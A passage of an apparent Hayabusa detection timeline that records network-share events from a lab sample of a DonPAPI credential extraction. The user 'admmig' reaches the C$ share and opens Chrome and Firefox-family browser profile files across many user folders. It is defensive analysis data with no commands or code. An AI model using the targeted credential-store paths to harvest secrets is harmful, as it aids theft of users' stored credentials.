0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.835 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.851 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.852 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.852 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.852 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.852 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.852 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.852 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.868 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.868 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.868 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.868 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.868 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.868 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.884 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.884 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.884 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.884 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.884 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.884 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.899 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.899 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.899 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.899 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.899 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.899 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.899 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.915 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.915 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.915 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.915 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.915 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.915 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.932 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.935 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.935 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.935 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.935 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.935 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.935 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.935 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.935 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.950 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.950 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.950 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.950 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.950 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.950 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.968 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.969 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.970 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.970 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.970 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.970 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.970 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.970 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.986 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.986 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.986 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.986 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.986 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.986 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default 